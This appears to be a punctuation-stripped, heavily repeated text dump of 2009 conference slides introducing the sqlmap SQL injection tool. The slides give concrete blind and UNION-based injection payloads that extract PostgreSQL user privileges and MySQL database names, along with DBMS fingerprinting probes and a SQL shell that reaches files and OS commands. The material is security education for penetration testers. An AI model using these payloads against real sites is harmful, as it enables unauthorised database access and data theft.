If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
